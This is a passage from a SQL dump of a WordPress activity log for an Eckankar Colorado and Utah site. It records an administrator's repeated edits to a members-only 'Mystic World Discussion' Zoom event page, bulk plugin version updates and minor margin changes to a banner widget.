class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216610,35663,'_message_key','post_updated'),(216611,35663,'_user_id','2'),(216612,35663,'_user_login','S8zhaBda'),(216613,35663,'_user_email','nada@zipnadanot.org'),(216614,35663,'_server_remote_addr','76.130.120.x'),(216615,35663,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216616,35664,'post_id','269149'),(216617,35664,'post_type','mec-events'),(216618,35664,'post_title','Mystic World Discussion'),(216619,35664,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a href=\"http://www.eckankar.org\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216620,35664,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216621,35664,'_message_key','post_updated'),(216622,35664,'_user_id','2'),(216623,35664,'_user_login','S8zhaBda'),(216624,35664,'_user_email','nada@zipnadanot.org'),(216625,35664,'_server_remote_addr','76.130.120.x'),(216626,35664,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216627,35665,'post_id','269149'),(216628,35665,'post_type','mec-events'),(216629,35665,'post_title','Mystic World Discussion'),(216630,35665,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216631,35665,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>September 2003</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216632,35665,'_message_key','post_updated'),(216633,35665,'_user_id','2'),(216634,35665,'_user_login','S8zhaBda'),(216635,35665,'_user_email','nada@zipnadanot.org'),(216636,35665,'_server_remote_addr','76.130.120.x'),(216637,35665,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216638,35666,'post_id','269149'),(216639,35666,'post_type','mec-events'),(216640,35666,'post_title','Mystic World Discussion'),(216641,35666,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>September 2003</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216642,35666,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>September 2023</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216643,35666,'_message_key','post_updated'),(216644,35666,'_user_id','2'),(216645,35666,'_user_login','S8zhaBda'),(216646,35666,'_user_email','nada@zipnadanot.org'),(216647,35666,'_server_remote_addr','76.130.120.x'),(216648,35666,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216649,35667,'post_id','269149'),(216650,35667,'post_type','mec-events'),(216651,35667,'post_title','Mystic World Discussion'),(216652,35667,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>September 2023</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216653,35667,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>September 2023</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copy of the issue on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216654,35667,'_message_key','post_updated'),(216655,35667,'_user_id','2'),(216656,35667,'_user_login','S8zhaBda'),(216657,35667,'_user_email','nada@zipnadanot.org'),(216658,35667,'_server_remote_addr','76.130.120.x'),(216659,35667,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216660,35668,'post_id','268425'),(216661,35668,'post_type','mec-events'),(216662,35668,'post_title','Mystic World Discussion  &#8212; ONLINE TEMPLATE'),(216663,35668,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\n<div>\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\n</div>\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Members Newsletter.</span></strong></span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\n</div>\n</div>\n</div>'),(216664,35668,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>September 2023</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copy of the issue on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216665,35668,'post_prev_post_date','2023-06-29 08:58:52'),(216666,35668,'post_new_post_date','2023-10-02 14:41:05'),(216667,35668,'_message_key','post_updated'),(216668,35668,'_user_id','2'),(216669,35668,'_user_login','S8zhaBda'),(216670,35668,'_user_email','nada@zipnadanot.org'),(216671,35668,'_server_remote_addr','76.130.120.x'),(216672,35668,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268425&action=edit'),(216673,35669,'plugin_slug','folders-pro'),(216674,35669,'plugin_name','Folders Pro'),(216675,35669,'plugin_title','Folders Pro'),(216676,35669,'plugin_description','Arrange media, pages, custom post types and posts into folders <cite>By <a href=\"https://premio.io/downloads/folders/\">Premio</a>.</cite>'),(216677,35669,'plugin_author','<a href=\"https://premio.io/downloads/folders/\">Premio</a>'),(216678,35669,'plugin_version','2.9.9'),(216679,35669,'plugin_url',''),(216680,35669,'plugin_update_info_plugin','folders-pro/folders.php'),(216681,35669,'plugin_update_info_package','https://go.premio.io/edd-sl/package_download/MTY5NjM3MTAzNjpiMzAzYmY3OTQ5N2RiZDk3MGVmM2NjMzdjNzNhYjZlMDo2ODc6NzBkMWFjYmU3NDZlNzg4NDM4NGRiZjhhZTJiMDgyZjY6aHR0cHNALy9lY2thbmthci1jb2xvcmFkby5vcmc6MA=='),(216682,35669,'plugin_prev_version','2.9.8'),(216683,35669,'_message_key','plugin_bulk_updated'),(216684,35669,'_user_id','2'),(216685,35669,'_user_login','S8zhaBda'),(216686,35669,'_user_email','nada@zipnadanot.org'),(216687,35669,'_server_remote_addr','76.130.120.x'),(216688,35669,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(216689,35670,'plugin_slug','ninja-forms'),(216690,35670,'plugin_name','Ninja Forms'),(216691,35670,'plugin_title','<a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=readme\">Ninja Forms</a>'),(216692,35670,'plugin_description','Ninja Forms is a webform builder with unparalleled ease of use and features. <cite>By <a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=Plugins+WP+Dashboard\">Saturday Drive</a>.</cite>'),(216693,35670,'plugin_author','<a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=Plugins+WP+Dashboard\">Saturday Drive</a>'),(216694,35670,'plugin_version','3.6.32'),(216695,35670,'plugin_url','http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=readme'),(216696,35670,'plugin_prev_version','3.6.31'),(216697,35670,'_message_key','plugin_bulk_updated'),(216698,35670,'_user_id','2'),(216699,35670,'_user_login','S8zhaBda'),(216700,35670,'_user_email','nada@zipnadanot.org'),(216701,35670,'_server_remote_addr','76.130.120.x'),(216702,35670,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(216703,35671,'plugin_slug','wp-fastest-cache'),(216704,35671,'plugin_name','WP Fastest Cache'),(216705,35671,'plugin_title','<a href=\"http://wordpress.org/plugins/wp-fastest-cache/\">WP Fastest Cache</a>'),(216706,35671,'plugin_description','The simplest and fastest WP Cache system <cite>By <a href=\"https://www.wpfastestcache.com/\">Emre Vona</a>.</cite>'),(216707,35671,'plugin_author','<a href=\"https://www.wpfastestcache.com/\">Emre Vona</a>'),(216708,35671,'plugin_version','1.2.0'),(216709,35671,'plugin_url','http://wordpress.org/plugins/wp-fastest-cache/'),(216710,35671,'plugin_prev_version','1.1.9'),(216711,35671,'_message_key','plugin_bulk_updated'),(216712,35671,'_user_id','2'),(216713,35671,'_user_login','S8zhaBda'),(216714,35671,'_user_email','nada@zipnadanot.org'),(216715,35671,'_server_remote_addr','76.130.120.x'),(216716,35671,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(216717,35672,'widget_id_base','custom_html'),(216718,35672,'widget_name_translated','Custom HTML'),(216719,35672,'sidebar_id','null'),(216720,35672,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 200px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(216721,35672,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 26px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(216722,35672,'_message_key','widget_edited'),(216723,35672,'_user_id','2'),(216724,35672,'_user_login','S8zhaBda'),(216725,35672,'_user_email','nada@zipnadanot.org'),(216726,35672,'_server_remote_addr','76.130.120.x'),(216727,35672,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(216728,35673,'widget_id_base','custom_html'),(216729,35673,'widget_name_translated','Custom HTML'),(216730,35673,'sidebar_id','null'),(216731,35673,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 200px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(216732,35673,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(216733,35673,'_message_key','widget_edited'),(216734,35673,'_user_id','2'),(216735,35673,'_user_login','S8zhaBda'),(216736,35673,'_user_email','nada@zipnadanot.org'),(216737,35673,'_server_remote_addr','76.130.120.x'),(216738,35673,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(216739,35674,'setting_id','widget_custom_html[6]'),(216740,35674,'setting_old_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 200px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(216741,35674,'setting_new_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(216742,35674,'control_id','widget_custom_html[6]'),(216743,35674,'control_label','Custom 